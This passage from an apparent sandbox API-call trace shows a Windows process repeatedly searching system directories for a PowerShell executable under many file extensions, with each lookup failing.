	[0327.140] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0327.141] SetErrorMode (uMode=0x1) returned 0x1
	[0327.141] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.148] SetErrorMode (uMode=0x1) returned 0x1
	[0327.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.150] SetErrorMode (uMode=0x1) returned 0x1
	[0327.150] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.150] SetErrorMode (uMode=0x1) returned 0x1
	[0327.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.151] SetErrorMode (uMode=0x1) returned 0x1
	[0327.151] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.151] SetErrorMode (uMode=0x1) returned 0x1
	[0327.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.151] SetErrorMode (uMode=0x1) returned 0x1
	[0327.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.152] SetErrorMode (uMode=0x1) returned 0x1
	[0327.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.152] SetErrorMode (uMode=0x1) returned 0x1
	[0327.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.152] SetErrorMode (uMode=0x1) returned 0x1
	[0327.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.153] SetErrorMode (uMode=0x1) returned 0x1
	[0327.153] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.153] SetErrorMode (uMode=0x1) returned 0x1
	[0327.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.153] SetErrorMode (uMode=0x1) returned 0x1
	[0327.153] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.154] SetErrorMode (uMode=0x1) returned 0x1
	[0327.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.154] SetErrorMode (uMode=0x1) returned 0x1
	[0327.154] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.154] SetErrorMode (uMode=0x1) returned 0x1
	[0327.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.154] SetErrorMode (uMode=0x1) returned 0x1
	[0327.155] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.155] SetErrorMode (uMode=0x1) returned 0x1
	[0327.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.155] SetErrorMode (uMode=0x1) returned 0x1
	[0327.155] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.155] SetErrorMode (uMode=0x1) returned 0x1
	[0327.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.156] SetErrorMode (uMode=0x1) returned 0x1
	[0327.156] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.156] SetErrorMode (uMode=0x1) returned 0x1
	[0327.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.156] SetErrorMode (uMode=0x1) returned 0x1
	[0327.156] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.157] SetErrorMode (uMode=0x1) returned 0x1
	[0327.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.157] SetErrorMode (uMode=0x1) returned 0x1
	[0327.157] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.157] SetErrorMode (uMode=0x1) returned 0x1
	[0327.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.157] SetErrorMode (uMode=0x1) returned 0x1
	[0327.158] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.158] SetErrorMode (uMode=0x1) returned 0x1
	[0327.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.158] SetErrorMode (uMode=0x1) returned 0x1
	[0327.158] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.158] SetErrorMode (uMode=0x1) returned 0x1
	[0327.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.159] SetErrorMode (uMode=0x1) returned 0x1
	[0327.159] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.159] SetErrorMode (uMode=0x1) returned 0x1
	[0327.159] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.159] SetErrorMode (uMode=0x1) returned 0x1
	[0327.159] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.160] SetErrorMode (uMode=0x1) returned 0x1
	[0327.160] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.160] SetErrorMode (uMode=0x1) returned 0x1
	[0327.160] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.160] SetErrorMode (uMode=0x1) returned 0x1
	[0327.160] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.161] SetErrorMode (uMode=0x1) returned 0x1
	[0327.161] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.161] SetErrorMode (uMode=0x1) returned 0x1
	[0327.161] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.161] SetErrorMode (uMode=0x1) returned 0x1
	[0327.161] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.161] SetErrorMode (uMode=0x1) returned 0x1
	[0327.162] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.162] SetErrorMode (uMode=0x1) returned 0x1
	[0327.162] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.162] SetErrorMode (uMode=0x1) returned 0x1
	[0327.162] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.162] SetErrorMode (uMode=0x1) returned 0x1
	[0327.162] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.163] SetErrorMode (uMode=0x1) returned 0x1
	[0327.163] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.163] SetErrorMode (uMode=0x1) returned 0x1
	[0327.163] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.163] SetErrorMode (uMode=0x1) returned 0x1
	[0327.163] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.164] SetErrorMode (uMode=0x1) returned 0x1
	[0327.164] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.164] SetErrorMode (uMode=0x1) returned 0x1
	[0327.164] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.164] SetErrorMode (uMode=0x1) returned 0x1
	[0327.164] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.164] SetErrorMode (uMode=0x1) returned 0x1
	[0327.165] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.165] SetErrorMode (uMode=0x1) returned 0x1
	[0327.165] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.165] SetErrorMode (uMode=0x1) returned 0x1
	[0327.165] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.165] SetErrorMode (uMode=0x1) returned 0x1
	[0327.166] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.166] SetErrorMode (uMode=0x1) returned 0x1
	[0327.166] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.764] SetErrorMode (uMode=0x1) returned 0x1
	[0327.765] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.765] SetErrorMode (uMode=0x1) returned 0x1
	[0327.765] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.765] SetErrorMode (uMode=0x1) returned 0x1
	[0327.765] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.765] SetErrorMode (uMode=0x1) returned 0x1
	[0327.766] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.766] SetErrorMode (uMode=0x1) returned 0x1
	[0327.766] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.766] SetErrorMode (uMode=0x1) returned 0x1
	[0327.766] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.766] SetErrorMode (uMode=0x1) returned 0x1
	[0327.766] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.767] SetErrorMode (uMode=0x1) returned 0x1
